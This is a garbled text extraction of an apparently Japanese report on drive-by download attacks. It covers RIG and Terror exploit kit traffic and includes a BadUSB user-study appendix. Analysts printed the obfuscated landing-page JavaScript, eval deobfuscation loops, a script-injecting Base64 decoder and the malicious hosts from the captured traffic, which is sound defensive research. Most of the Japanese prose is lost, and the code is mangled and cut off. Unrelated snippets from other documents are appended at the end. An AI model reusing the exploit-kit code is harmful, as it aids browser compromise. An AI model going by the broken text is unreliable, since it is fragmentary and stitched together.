2018 Drive-by Download
|
|
- みそら なかきむら
- 4 years ago
- Views:
Transcription
1 2018 Drive-by Download
2 1 2 2 Drive-by Download Exploit Kit Exploit Kit Exploit Kit A BadUSB 18 A A A A A
3 1 Drive-by Download Web (Drive) (Download) Drive-by Download 2010 Gumblar[1] Web Drive-by Download Exploit Kit (Exploits as a Service)[2] Exploit Kit 2017 RIG Exploit Kit Drive-by Download Exploit Kit
4 2 Drive-by Download 2.1 Drive-by Download 2.1 (1) Web 3 SNS URL (2) (3) Flash Player (4) 2.2 Exploit Kit Drive-by Download Exploit Kit 1 Exploit Kit URL URL Exploit Kit Exploit Kit Exploit Kit Exploit Kit Exploit Kit URL
5 (1)Access Compromised Web Site (2)Drive User (3)Exploit (4)Malware Malware Attack 2.1 Drive-by Download
6 Drive-by Download StarC[3] URL Pcap Drive-by Download Exploit Kit Exploit Kit Exploit Kit 3.2 Exploit Kit 50 Drive-by Download Exploit Kit 3.1 Exploit Kit RIG Exploit Kit 2 Terror Exploit Kit 2017 Drive-by Download RIG Exploit Kit RIG Exploit Kit IP [4][5] 3.1 Exploit Kit Exploit Kit Terror Exploit Kit 2 RIG Exploit Kit 48
7 3.3 Exploit Kit Exploit Kit 3.1 Exploit Kit (1)Landing Page Landing Page (2) (3) 2 Exploit Kit Exploit Kit (1) Landing Page (2) Exploit (Obfuscated) (3) Malware Payload User 3.1 Exploit Kit
8 3.3.1 Terror Exploit Kit Terror Exploit Kit 2016 Exploit Kit [6] Sundown Exploit Kit[7] 3.2 Terror Exploit Kit 3.2 Terror Exploit Kit Result Protocol Host URL Comment 302 HTTP popunder.youdonthaveenough.faith /popunder.php Gate 200 HTTP reminder.deficitgarage.download /forum naoeyth/showthread.php... Landing Page 200 HTTP reminder.deficitgarage.download /forum naoeyth/0vigerkeqq20... Exploit 200 HTTP reminder.deficitgarage.download /forum naoeyth/7wlkyfwm7t... Malware Exploit Kit Landing Page Landing Page iframe ( 3.2) Exploit Page URL iframe Exploit URL Exploit Page Terror Exploit Kit Landing Page ( 3.3) <iframe src=' YTH/0ViGerkEQQ20/rSir7V9aOI8p.html > </iframe> 3.2 iframe Exploit Kit URL Sub halisidragons() On Error Resume Next key="kseeka0jmxuto4qrpdfon3qc" url=" hp" Dongslm3de=userAgent 3.3 Terror Exploit Kit
9 3.3.2 RIG Exploit Kit RIG Exploit Kit 2016 Exploit Kit [8] 2018 Drive-by Download 3.3 RIG Exploit Kit 3.3 RIG Exploit Kit Result Protocol Host URL Comment 200 HTTP jackpotfreerols.cf / 200 HTTP jackpotfr22.cf /yo/? 200 HTTP /?LpetravelingSwEzlY1dWlgRpa320XUyBKehJWA... Landing Page 200 HTTP /?vel flight1558man1330vanxhzqmrxybrzffy... Payload Terror Exploit Kit Landing Page Landing Page JavaScript Flash Player swf Landing Page 3 JavaScript ( 3.4) 3 for eval ( 3.5) js JavaScript Google Chrome Console <html><head> <meta http-equiv="x-ua-compatible" content="ie=10"> <meta charset="utf-8"> </head><body><script>polrjbkcbs="} ur ;}} fg r+ bx 0 &265 q-8 a -1 q hil s* j ;/* +6; +c b x] s /*g143g36fn*/ piacvbprfb="func ng d al cd en / 449d s*/b [c ate eme ] cr t [t ] te avas pt, ex a,a gete ents a icxfzisrxf=".<>= " ')( t n";/*x70946a52018d8008f*/ for(xtdniilefe='',ralnqueuxl=3165,icyutikool=0;ralnqueuxl>-1,icyutikool<=3165;ralnqueuxl--,icyutikool++){ xtdniilefe+=piacvbprfb[icyutik </script> section1 <script>ubqkmzwhau="5 eo te nc out /set 04f j d /*s abc etu df ed n fun ueo */v 640 5h 24d7 * /*g25g27fn*/ zxkcwerclj="var gos ; 551 d227 hfj 94 ow */e cscr t *s fj 6fs VBs cr /* / QprltioGhB=".<>= " ')( t n";/*x79691a40601d82055f*/ for(jvfkszlzdx='',vtoiepliar=3409,btjokmplzw=0;vtoiepliar>-1,btjokmplzw<=3410;vtoiepliar--,btjokmplzw++){ JVFkszLzDX+=zxkCWErcLj[BtJO </script> section2 <script>aqlomzduwt="fs* j r;/ re ; dfg r+ xbx a 1 q ile 2; q+ 6 ];b xcvx 5fs 6hfj d5 s5 /*g96g148fn*/ KgCrqIlCrS="/* 48d5 hfj5 fs*/ tion d var, cume /*s8 d3 hfj7 6fs bc eat le ] pt s81 5d60 hf 29f [t ] t/ asc osdxpxhfuc=".<>= " ')( t n";/*x28128a33470d56969f*/ for(xypclgcdry='',prpzvouujo=643,wayllvmuij=0;prpzvouujo>-1,wayllvmuij<=644;prpzvouujo--,wayllvmuij++){ XYPCLgCdRY+=KgCrqIlCrS[waYlLvM </script></body></html> 3.4 RIG Exploit Kit Landing Page section3 3 1
10 3 3.5 (1) (2) split ( 3.6) 3.7 for split (1) (2) (3) eval eval eval for Console eval QuNbWbmGMx="nr }}re ga +df x& 5-8& aq a 9- (1) 1 le s*/w fj ;/* 6;b 6+c b ] xcvx s*/ j17 d458 czkabgfocq="func nk var l do ent *s73 53 fj42 */ [ ate men (2) sbyt ame crip xxkheysbjo=".<>= " ')( (3) t n";/*x43219a28390d51638f*/ for(tyzoxtdfhv='',iqwziponci=3137,dmgveymzkm=0;iqwziponci>-1,dmgveymz 3.5 RIG Exploit Kit JavaScript QuNbWbmGMx="n r }}re g a + df x & 5-8 & aq a +c b ] xcvx s*/ j17 d458 s2 {c x L r x i;} ] i A[x, SD45 la */r s864 FLM JKS EFG A /v e ca {k,a } ] Befo nse e[ rent ],a b[ pt va xt/ pe a { tio"/*j32308e*/["sp"+("lit")]/*gfh9022hg*/(' '); split for (TyzOXTdfhV = '', iqwziponci = 3137, dmgveymzkm = 0; iqwziponci > -1, dm TyzOXTdfhV += czkabgfocq[dmgveymzkm]; if (typeof QuNbWbmGMx[iQWzIpoNCi]!= 'undefined') { TyzOXTdfhV += QuNbWbmGMx[iQWzIpoNCi]; }; } for (LletajyZhL = 0; LletajyZhL <= xxkheysbjo.length - 1; LletajyZhL++) { TyzOXTdfhV = TyzOXTdfhV["replace"](new RegExp(xxKhEySbJO["substr"](LletajyZ LletajyZhL++; } eval(tyzoxtdfhv); 3.7 for eval
11 I Base64 ( 3.8) s( ) script s Flash Player URL ( 3.11) swf Flash Player RIG Exploit Kit swf swf Adobe Flash Player swf PoC swf Exploit Kit Terror Exploit Kit 2 Exploit Kit RIG Exploit Kit Exploit Kit IP Exploit Kit
12 function k() { var a = l(), c = document, /*s73213d53572hfj4285fs*/ b = c["createelement"]("script"); b["type"] = "text/javascript", b["text"] = a, a = c["getelementsbytagname"]("sc } try { k() } catch (m) {} function l() { var s ="dmfyigznzgznzca9iciioy8qczq3nza5zdm2mjy4agzqotu2mtvmcyovcglmd dzc3nzkx19lypzzghkotu4otfoznmqlw =="; /*s65026d21699hfj75792fs*/ var e = {}, i, b = 0, c, x, aq = 0, a, r = "", dfgdfg = String.fromCharCode, L = s.length; /*s36259d28398hfj40713fs*/ var A = "ABCDEFGHIJKSD454FLMNOPQRSTUVWXYSD454FZabcdefghijklmnopq xcvx = "atcharat".substr(2); for (i = 0; i < 64; i++) { /*s31484d39289hfj15241fs*/ e[a[xcvx](i)] = i; } for (x = 0; x < L; x++) { c = e[ /*s29765d45840hfj17773fs*/ s[xcvx](x)]; b = (b << 6) + c; aq += 6; bx = 2; /*s75067d87078hfj63800fs*/ while (aq >= (9-1)) { ((a = (b >>> (aq -= 8)) & ) (x < bx)) && (r += dfgdfg(a)); } } return r; } 3.8 eval
13 var fgdfgd = ""; /*s47709d36268hfj95615fs*/ function hcvvsdf(num, width) { var xcvaa = " abcdef"; /*s95073dffd100000hd11665hfs*/ var hcvvsdf = xcvaa.substr(num & 0xF, 1); while (num > 0xF) { num = num >>> 4; hcvvsdf = xcvaa.substr(num & 0xF, 1) + hcvvsdf; } var width = (width? width : 0); while (hcvvsdf.length < width) hcvvsdf = "0" + hcvvsdf; return hcvvsdf; } function gfdgsdf566(u, k) { var fr = String.fromCharCode; var c = "", b = "", d = "", f = fr(0x20), g = fr(0), v = fr(0x22); var app = k + v + f + v + u + v + f + v + navigator.useragent + v + g + g + g + g; app.length % 2 && (app += g); for (var e = 0; e < app.length; e++) { b = hcvvsdf(app.charcodeat(e), 2); d = hcvvsdf(app.charcodeat(e + 1), 2); c += b + d; e += 1; } return c; } 3.9
14 gfdgsdf566(" UKFEMUvWA0eKwYuZhavVF5uxFDfGpbf1Fx7spV-dCF- EmvdvdLEHIwCh1UTA&party=SwdjzYpUVVkT_6j4iECBmxKbgpPU-BCENw4U- JbBEbAz21z3nrRGc892wRKCu2VWzuktUVgR0Q9O3K3I&snicers=MTY1NjgwNzQ=", "akxyxuxusa")); Key URL 3.10 URL
15 <?xml version="1.0" encoding="utf-8"?> <swf version="32" compressed="1"> <Header framerate="30" frames="1"> <size> <Rectangle left="0" right="16000" top="0" bottom="12000"/> </size> <tags> <FileAttributes hasmetadata="1" allowabc="1" suppresscrossdomaincaching="0" swfrelativeurls="0" usenetwork="1"/> <UnknownTag id="0xff"> <data>aa==</data> </UnknownTag> <Metadata> <rdf:rdf xmlns:rdf=" <rdf:description xmlns:dc=" xmlns:asc=" <dc:format>application/x-shockwave-flash</dc:format> <asc:compiler name="actionscript Compiler" version="2.0.0" build="354154"/> </rdf:description> </rdf:rdf> </Metadata> <DefineBinaryData objectid="3"> <data> <data>n2kakw==</data> </data> </DefineBinaryData> <DefineBinaryData objectid="2"> <data> <data>atk3s2ggqy4khgtoajcynxm=</data> </data> </DefineBinaryData> <DefineBinaryData objectid="1"> <data> 3.11 Flash Player swf
16 4 Drive-by Download Exploit Kit Exploit Kit Exploit Kit Terror Exploit Kit 1 RIG Exploit Kit Fallout Exploit Kit[9] Grandsoft Exploit Kit[10] Exploit Kit
17 [1] -03 Gumblar ( ) [2] TrendMicro ( ) [3] StarC Drive-by Download [4] Drive-by Download RIG Exploit Kit Computer Security Symposium 2017 pp [5] RIG Exploit Kit Computer Security Symposium 2017 pp [6] McAfee Threat Landscape Dashboard Terror Exploit Kit ( ) [7] McAfee Threat Landscape Dashboard Sundown Exploit Kit ( ) [8] Security NEXT RIG - ( ) [9] nao sec Hello Fallout Exploit Kit ( ) [10] TrendMicro 2016 ( )
18
19 A BadUSB A.1 BadUSB PC USB USB PC USB USB PC CPU BadUSB USB PC BadUSB PC BadUSB PC BadUSB 31 BadUSB
20 A.2 A.2.1 BadUSB BadUSB Arduino Arduino BadUSB Arduino USB A.2.2 BadUSB 5 BadUSB BadUSB Mac 1) 2) 3) 4) 5) A.2.3 Arduino BadUSB Arduino Reonard Usage 101 Arduino IDE BadUSB OS Windows Mac OS
21 A.3 A.3.1 A rduino Arduino BadUSB (1) (2) 1 (3) (4) (5) PC BadUSB BadUSB OS BadUSB BadUSB T A.3.2 IT IT 3 IT i) OS ii) iii) *1 3
22 A.3.3 SeBIS SeBIS[1][2] 18 (1) (2) (3) (4) (5) 5 1) 2) / 3) 4) PIN 5) 6) (4) 7) 8) 9) 10) 11) URL web 12) SSL https // 13) ( ) 14) 15) 16) 17) (5) 18)
23 A.4 A.1 1 No B B B M M B M B B B B M B M B B B M B B B B B B B B B B B B B
24 A.2 2 No. OS BadUSB mac chrome windows chrome windows chrome windows chrome windows chrome mac chrome mac firefox mac chrome mac,windows chrome windows chrome mac chrome windows chrome mac chrome windows,mac,ubuntu,centos chrome windows IE,chrome windows chrome windows chrome windows chrome mac chrome mac chrome windows chrome windows chrome windows chrome windows chrome centos chrome windows chrome mac chrome windows firefox windows chrome windows chrome windows IE
25 devices response time [s] A.1 A.3 (1) (2) (4) (5) A.4 (1) (1) (2) (4) (5) T
26 A.1 BadUSB USB 2.1 BadUSB PC (2) (5) A.3 BadUSB (Accuracy) ( + *0.5)*100/ 1 5 (5) 100 (4) 51.6 (2) (4) (5) (1) (1) (2) 71.0 (4) 3.4 A.5 IT IT Frequency SeBIS A.2 SeBIS A.5 IT A
27 Accuracy SeBIS A.3 A.3 SeBIS SeBIS A.6 SeBIS A < µ(a) A µ(a) p T < µ(t ) T µ(t ) p S < µ(s) S µ(s) A.6 SeBIS S µ(s) µ(a) µ(t ) SeBIS 1 p
28 A.5 BadUSB BadUSB BadUSB
29 [1] Matthew Tischer, et. al, Users Really Do Plug in USB Drives They Find, ACM CHI 15, [2] S. Egelman and E. Peer, Scaling the Security Wall: Developing a Security Behavior Intentions Scale (SeBIS), in SIGCHI Conference on Human Factors in Computing Systems (CHI 15). ACM, 2015.
Drive-by Download RIG Exploit Kit
2017 StarC Drive-by Download 1 1 2 2 2.1 Drive-by Download.................................... 2 2.2 RIG Exploit Kit......................................... 2 2.3.............................................
More informationFlash Player ローカル設定マネージャー
ADOBE FLASH PLAYER http://help.adobe.com/ja_jp/legalnotices/index.html iii................................................................................................................. 1...........................................................................................................
More information2.3 1 RIG Exploit Kit (4) 4 Exploit Kit 2.2 RIG Exploit Kit RIG Exploit Kit 1 5 (1) Web Web (2) RIG Exploit Kit URL (3) URL iframe RIG Exploit Kit (4)
StarC Drive-by Download 1 2017 4 Web Web Drive-by Download [1] Driveby Download Web Web Web Drive-by Download Exploit Kit Exploit Kit Web Exploit Kit Drive-by Download Exploit Kit RIG Exploit Kit [2][3][4]
More informationB 20 Web
B 20 Web 0753018 21 1 29 1 1 6 2 8 3 UI 10 3.1........................ 10 3.2 Web............ 11 3.3......... 12 4 UI 14 4.1 Web....................... 15 4.2 Web........... 16 4.3 Web....................
More informationAdobe AIR のセキュリティ
ADOBE AIR http://help.adobe.com/ja_jp/legalnotices/index.html iii................................................................. 1.....................................................................
More information07_経営論集2010 小松先生.indd
19 1 2009 105 123 Web Web Web Web World Wide Web WWW OS 1990 WWW Web HTML CSS JavaScript Web 1 WWW 2 Web Web 3 Web 4 HTML5 5 Web Web 3 1970 WWW HTML Web WWW WWW WWW WWW WWW 105 Web WWW 2 Web 1 1 NTT NTT
More information2 [2] Flow Visualizer 1 DbD 2. DbD [4] Web (PV) Web Web Web 3 ( 1) ( 1 ) Web ( 2 ) Web Web ( 3 ) Web DbD DbD () DbD DbD DbD 2.1 DbD DbD URL URL Google
Drive-by Download 1,a) 1,b) Web Drive-by Download(DbD) DbD Web DbD HTTP DbD Web DbD, Drive-by Download The Network Visualization Tool for detecting the Drive-by Download attacks. Amako Katsuhiro 1,a) Takada
More informationA(6, 13) B(1, 1) 65 y C 2 A(2, 1) B( 3, 2) C 66 x + 2y 1 = 0 2 A(1, 1) B(3, 0) P 67 3 A(3, 3) B(1, 2) C(4, 0) (1) ABC G (2) 3 A B C P 6
1 1 1.1 64 A6, 1) B1, 1) 65 C A, 1) B, ) C 66 + 1 = 0 A1, 1) B, 0) P 67 A, ) B1, ) C4, 0) 1) ABC G ) A B C P 64 A 1, 1) B, ) AB AB = 1) + 1) A 1, 1) 1 B, ) 1 65 66 65 C0, k) 66 1 p, p) 1 1 A B AB A 67
More information29 jjencode JavaScript
Kochi University of Technology Aca Title jjencode で難読化された JavaScript の検知 Author(s) 中村, 弘亮 Citation Date of 2018-03 issue URL http://hdl.handle.net/10173/1975 Rights Text version author Kochi, JAPAN http://kutarr.lib.kochi-tech.ac.jp/dspa
More informationORCA (Online Research Control system Architecture)
ORCA (Online Research Control system Architecture) ORCA Editor Ver.1.2 1 9 10 ORCA EDITOR 10 10 10 Java 10 11 ORCA Editor Setup 11 ORCA Editor 12 15 15 ORCA EDITOR 16 16 16 16 17 17 ORCA EDITOR 18 ORCA
More informationFileMaker Server Getting Started Guide
FileMaker Server 11 2004-2010 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker FileMaker, Inc. FileMaker, Inc. FileMaker FileMaker,
More information(a) (b) 1 JavaScript Web Web Web CGI Web Web JavaScript Web mixi facebook SNS Web URL ID Web 1 JavaScript Web 1(a) 1(b) JavaScript & Web Web Web Webji
Webjig Web 1 1 1 1 Webjig / Web Web Web Web Web / Web Webjig Web DOM Web Webjig / Web Web Webjig: a visualization tool for analyzing user behaviors in dynamic web sites Mikio Kiura, 1 Masao Ohira, 1 Hidetake
More informationFileMaker Server 9 Getting Started Guide
FileMaker Server 10 2007-2009 FileMaker, Inc. All rights reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker Bento Bento FileMaker, Inc. Mac Mac Apple Inc. FileMaker
More information25 About what prevent spoofing of misusing a session information
25 About what prevent spoofing of misusing a session information 1140349 2014 2 28 Web Web [1]. [2] SAS-2(Simple And Secure password authentication protocol, ver.2)[3] SAS-2 i Abstract About what prevent
More informationディスプレイと携帯端末間の通信を実現する映像媒介通信技術
Data Transfer Technology to Enable Communication between Displays and Smart Devices 倉木健介 中潟昌平 田中竜太 阿南泰三 あらまし Abstract Recently, the chance to see videos in various places has increased due to the speedup
More informationDrive-by Download 攻撃に おけるRIG Exploit Kitの 解析回避手法の調査
高対話型クライアントハニーポット StarC の開発と Drive-by Download 攻撃のトラフィックデータの解析 明治大学総合数理学部小池倫太郎 Drive-by Download攻撃 概要 Webサイトを使ったWebブラウザに対する攻撃 悪性Webサイトへ誘導された脆弱なWebブラウザに対して そのブラ ウザの脆弱性を突くようなコードを送り込んで制御を奪い マルウェ アをダウンロード 実行させる
More informationスライド 1
b-pac 活用資料 Web アプリケーション編 ブラザー工業株式会社 2018 Brother Industries, Ltd. All Rights Reserved. 1 目的と対象者 目的 : Web からラベルを印刷するためのシステム構成とコーディング例を紹介します 対象者 : Web プログラミングに関する知識を有する開発者 2018 Brother Industries, Ltd. All
More informationuntitled
IT IT IT IT 1 IT 2 Software as a Service (SaaS 3 ) IT SaaS 4 SaaS SaaS PC SaaS SaaS Web SaaS ID IT SaaS IT 1 2 3 Software as a Service ASP(Application Service Provider) SaaS 4 ASPIC SaaS SaaS SaaS SaaS
More informationMicrosoft PowerPoint - 情報システム20131127.pptx
2013 11 27 NTT ISP IP 32 8. FTTH OLT ONU( ) ADSL DSLAM ADSL (ISDN) WiMAX ISP i sp ISP LAN ISP IP PPPoE FTTH ADSL BAS ID IP PPP RAS ID IP DHCP DHCP IP PPPoE ID ID ISP @ IP IPCP ID PC PC WAN LAN PC PPPoE
More informationohp.mgp
2019/06/11 A/B -- HTML/WWW(World Wide Web -- (TA:, [ 1 ] !!? Web Page http://edu-gw2.math.cst.nihon-u.ac.jp/~kurino VNC Server Address : 10.9.209.159 Password : vnc-2019 (2019/06/04 : : * * / / : (cf.
More informationVol. 28 No. 2 Apr. 2011 173 1. 1 Web Twitter/Facebook UI 4 1. 2. 3. 4. Twitter Web Twitter/Facebook e.g., Web Web UI 1 2 SNS 1, 2 2
172 SNS Web Web As social web sites such as blog and SNS(Social Network System) became popular, many people have communicated with their friends on the Web. Meanwhile, several problems of social web sites
More informationWeb Web Web Web i
28 Research of password manager using pattern lock and user certificate 1170369 2017 2 28 Web Web Web Web i Abstract Research of password manager using pattern lock and user certificate Takuya Mimoto In
More informationuntitled
ADOBE 1. 1.1 1 1 10 1.2-3 - 5-7 - - - - - - - 1 1-10 17 1.3 http://www.adobe.com/go/thirdparty_jp 2. 12 (a) 345 Park Avenue, San Jose, California 95110, U.S.A. Adobe Systems Incorporated 4-6 Riverwalk,
More informationFileMaker Server Getting Started Guide
FileMaker Server 13 2007-2013 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker Bento FileMaker, Inc. FileMaker WebDirect Bento FileMaker,
More informationFileMaker Server 9 Getting Started Guide
FileMaker Server 9 2007 FileMaker, Inc. All Rights Reserved. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker FileMaker, Inc. ScriptMaker FileMaker, Inc. FileMaker FileMaker,
More informationm_sotsuron
iphone Web 0848066 1. 1 1 1 2 iphone 2 3 2 4 3 2. 3 1 3 2 iphone Web 6 3 HTML 10 4 CSS 12 5 iphone 14 6 15 7 16 8 ipad 18 3. 22 iphone Web Web 2 iphone Web iphone iphone Web iphone Web PC 1 2000 iphone
More informationESP32-KEY-KIT-R1 (ESP-WROOM-32 ) Copyright c 2
ESP32-KEY-KIT-R1 (ESP-WROOM-32 ) http://www.microfan.jp/ http://store.shopping.yahoo.co.jp/microfan/ http://www.microfan.jp/shop/ 2017 4 Copyright c 2017 MicroFan, All Rights Reserved. i 1 ESP32-KEY-KIT-R1
More information2016 IP 1 1 1 1.1............................................. 1 1.2.............................................. 1 1.3............................................. 1 1.4.............................................
More informationuntitled
SVGMAP Coordinate Reference System SVG1.1 7 12 (Geographic Coordinate Systems) 1 SVG x=262 y=259 =139.6953494 =35.6906626 SVG x=333 y=283 =139.6965939 =35.6902857 SVG Map RDF/XML 2
More informationカスペルスキー アンチウイルス 2011 for Mac
2011 for Mac 1 2 3 4 5 6 7 8 1 2011 for Mac [ ] ( Mac OS Web [] Web PDF CD-ROM PDF WebPDF 1 Mac OS X 10.510.6 Mac OS X 10.6OS [ ] [ ] Finder 2011 2 2 2 3 3 1 7 8 8 9 10 2 11 12 12 13 17 3 18 18 18 19 20
More informationWeb (RDF) RDF RSS FOAF RDF Web RDF RDF google rdf filetype:rdf rdf Web 122, , [1] ( ) [2] RDF RSS 6
Web Web NEC Web (RDF) RDF RSS FOAF RDF Web RDF RDF google rdf filetype:rdf rdf Web 122,000 2003 11 5,440 2003 5 7 [1] ( http://www.atmarkit.co.jp/ ) [2] RDF RSS 6% 7% 39% RDF RSS 42% RSS (RDF Site Summary)
More informationuntitled
PC Internet Explorer Windows SafariMac OS X Mozilla FireFoxWindows / Macintosh Google ChromeWindows / Macintosh IE + Google Windows 1 Internet Explorer 10.x (O)(A) Internet Explorer (O) (B) (B) (B) 2 Web
More information1 Gumblar Fig. 1 Flow of Gumblar attack. Fig. 2 2 RequestPolicy Example of operation based on RequestPolicy. (3-b) (4) PC (5) Web Web Web Web Gumblar
DNS Web Web Request Policy Framework 1,a) 2 1 2011 11 30, 2012 6 1 Web Web Drive-by download Gumblar Web Web JavaScript Web Web Request Policy Framework Request Policy Framework Web Gumblar DNS Proposal
More informationWeb XXX.XXX.XXX.XXX - - [02/May/2010:12:52: ] "GET /url/url2/page2.htm HTTP/1.1" "http://www.domain.co.jp/url/url2/page1.htm" "(compatibl
Web Web-Site Analytics Fukuoka Financial Group, Inc. Mahiru Sunaga SAS Institute Japan Ltd. Kiyoshi Murakami (Combind log format) Apache Web 2 1 Web XXX.XXX.XXX.XXX - - [02/May/2010:12:52:55 +0900] "GET
More information2
2 485 1300 1 6 17 18 3 18 18 3 17 () 6 1 2 3 4 1 18 11 27 10001200 705 2 18 12 27 10001230 705 3 19 2 5 10001140 302 5 () 6 280 2 7 ACCESS WEB 8 9 10 11 12 13 14 3 A B C D E 1 Data 13 12 Data 15 9 18 2
More informationPrinter Driverセットアップ編
Microsoft MS-DOS Windows Windows Server Windows Vista Internet Explorer PowerPoint Outlook Microsoft Corporation Microsoft Corporation Intel Intel Inside Itanium Pentium Intel Corporation USB-IF Universal
More information取扱説明書 [F-08D]
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 a bc d a b c d 17 a b cd e a b c d e 18 19 20 21 22 a c b d 23 24 a b c a b c d e f g a b j k l m n o p q r s t u v h i c d e w 25 d e f g h i j k l m n o p q r s
More information11 Windows XP IP WEP (Web )
Docodemo-Net (WEP ) cis-supports 25 11 18 1 Docodemo-Net 3 2 Docodemo-Net 3 3 3 4 3 5 4 5.1 LAN........................................ 4 5.2 LAN........................................ 4 6 5 6.1 LAN........................................
More informationohp.mgp
A/B -- Excel (2) / skype -- 2011/05/24 !! Web Page http://edu-gw2.math.cst.nihon-u.ac.jp/~kurino : 2018 : Note-PC / DVD-Drive / USB Memory PC Note-PC Office MS-Office CST Portal (2012/04/24) (2012/04/17)
More informationTeradici Corporation #101-4621 Canada Way, Burnaby, BC V5G 4X8 Canada p +1 604 451 5800 f +1 604 451 5818 www.teradici.com Teradici Corporation Teradi
PCoIP TER0806003 TER0806003 Issue 2 0 Teradici Corporation #101-4621 Canada Way, Burnaby, BC V5G 4X8 Canada p +1 604 451 5800 f +1 604 451 5818 www.teradici.com Teradici Corporation Teradici Teradici Teradici
More information28 Docker Design and Implementation of Program Evaluation System Using Docker Virtualized Environment
28 Docker Design and Implementation of Program Evaluation System Using Docker Virtualized Environment 1170288 2017 2 28 Docker,.,,.,,.,,.,. Docker.,..,., Web, Web.,.,.,, CPU,,. i ., OS..,, OS, VirtualBox,.,
More informationMicrosoft Word - 11_thesis_08k1131_hamada.docx
23 08k1131 24 i JSP HTML CSS JavaScript Flash ios ii 1.... 1 2.... 1 2.1...1 2.2...2 2.3 Flash...2 2.4...2 2.5...3 2.6...3 2.7...4 3.... 4 3.1...4 3.2...6 3.3...8 3.4...9 3.5... 11 3.6... 12 3.7... 13
More information08encode part 2
A - - #8 bit, Byte, Yutaka Yasuda 1/2 0/1 CD 9 1 0 0 or 1 1/9 4,3,4,7,7,8,8,5,3,2,2 4,3,4,7,7,8,8,5,3,2,2 4,3,4,7,7,8,8,5,3,2,2 4,3,4,7,7,8,8,5,3,2,2 CD/CD-R CD / CD-R - 1 bit data (7bit) P 0 1 1 0 1
More informationFirefox Firefox Mozilla addons.mozilla.org (AMO) AMO Firefox Mozilla AMO Firefox Firefox Mozilla Firefox Firefox Firefox 年間登録数
Computer Security Symposium 2014 22-24 October 2014 Firefox 182-8585 1-5-1 takaken@ol.inf.uec.ac.jp {kazushi, oyama}@inf.uec.ac.jp Web Firefox Firefox Firefox Investigation on Attack and Stealth Methods
More informationⅠ.市場リスクの計測手法
1 2 3 4 { } n n 5 R R R R 1 6 7 8 9 , 10 11 12 13 14 15 T 16 T 17 18 19 20 21 22 23 99VaR 99 24 25 26 0.5 0.5 27 99 28 99 99 29 99 30 31 t-1 t-1 t-1 t-1 t-10 t-10 t-10 t-10 32 33 2 T 2 34 99 99 99 35 36
More informationWeb Web ID Web 16 Web Web i
24 Web Proposal of Web Application Password Operations Management System 1130343 2013 3 1 Web Web ID Web 16 Web Web i Abstract Proposal of Web Application Password Operations Management System Tatsuro
More information/var/lib/sharelatex/data/compiles/5a535643d11f6ba07fbbfa d68ddec3e /output.dvi
DEIM Forum 2018 G2-1 WebIndex 223 8522 E-mail: arisa@dbicskeioacjp, toyama@icskeioacjp Web Index(WIX), Web Web,, SNS, EC ( ), Web Index 1 Web 2 WIX, EC, SNS Wordtank 3, 4 ( ) 5 6, Web, Web, 2 Wordtank
More informationB000 B913 B913 S000 S500 L500 L913 B400 B913 B933 S320 L000 L913 492 498 P 38 5 P591 P595 P596 900 911 913 913 913 913 914 916 930 493 498 P 528 P594 P596 P597 910 913 913 913 913 913 914 918 700 723 746
More informationWebRTC P2P Web Proxy P2P Web Proxy WebRTC WebRTC Web, HTTP, WebRTC, P2P i
26 WebRTC The data distribution system using browser cache sharing and WebRTC 1150361 2015/02/27 WebRTC P2P Web Proxy P2P Web Proxy WebRTC WebRTC Web, HTTP, WebRTC, P2P i Abstract The data distribution
More informationIPSJ SIG Technical Report Vol.2014-HCI-157 No.26 Vol.2014-GN-91 No.26 Vol.2014-EC-31 No /3/15 1,a) 2 3 Web (SERP) ( ) Web (VP) SERP VP VP SERP
1,a) 2 3 Web (SERP) ( ) Web (VP) SERP VP VP SERP VP Web 1. Web Web Web Web Google SERP SERP 1 1 2-1-1, Hodokubo, Hino, Tokyo 191 8506, Japan 2 4-12-3, Higash-Shinagawa, Shinagawa, Tokyo 140 0002, Japan
More informationIT 1. IT 2. 2.1. IT 2.2. SKYSEA Client View Government License Light Edition Sky 1500 28 2 15 12 3. 4. 28 3 25 1 5. 5.1. (1) 28 4 1 (2) (3) (4) ISO27001 P (5) ISO/IEC20000 (6) USB 1 (7) OS (8) 1 CPU 4
More informationWindows CE 3.0 端末のスクリプトウイルスの危険性に関する調査・検討報告書
Windows CE 3.0 1...1 2...3 3 Windows CE 3.0...4 3.1 JS.Internal.f...6 3.1.1...6 3.1.2...7 3.2 JS.Lame...9 3.2.1...9 3.2.2...10 3.3 JS.NastyKiller...11 3.3.1...11 3.3.2...12 3.4 JS.Trojan.Freq.c...13 3.4.1...13
More information疎な転置推移確率行列
B E05(2019-05-15 Tue) : Time-stamp: 2019-05-17 Fri 16:18 JST hig http://hig3.net ( ) E05 B(2019) 1 / 11 x = 0,..., m 1 m. p(t), p(x, t) 1 double p [m] = { 1. 0, 0. 0,...., 0. 0 } ; /. m. / 2 / {p ( 0,
More informationUR12 Operation Manual
USB AUDIO INTERFACE EN DE FR ES PT IT ZH JA UR12 2 3 4 5 6 7 8 R L R L R L R L 9 10 11 12 13 14 15 Steinberg Web Site http://www.steinberg.net/ C.S.G., PA Development Division 2014 Yamaha Corporation Published
More informationuntitled
Flex 2010 1 21 5106139 5106144 1 -------------------------------------------------------------------------------------------------p3 ----------------------------------------------------------------------------------------------p4
More information2 2 2 6 9 9 10 14 18 19 21 22 22 Java 23 24 25 25 26 30 31 32 39 46 53 55 58 2 2.0 2.0R Ver.2.0R Java Java 2.0 2.0R 2.0R 2.0 Ver2.0 2.0R Ver2.0R 19 Sun Sun Microsystems Java Java Sun Microsystems, Inc.
More information読めば必ずわかる 分散分析の基礎 第2版
2 2003 12 5 ( ) ( ) 2 I 3 1 3 2 2? 6 3 11 4? 12 II 14 5 15 6 16 7 17 8 19 9 21 10 22 11 F 25 12 : 1 26 3 I 1 17 11 x 1, x 2,, x n x( ) x = 1 n n i=1 x i 12 (SD ) x 1, x 2,, x n s 2 s 2 = 1 n n (x i x)
More informationWorld Wide Web =WWW Web ipad Web Web HTML hyper text markup language CSS cascading style sheet Web Web HTML CSS HTML
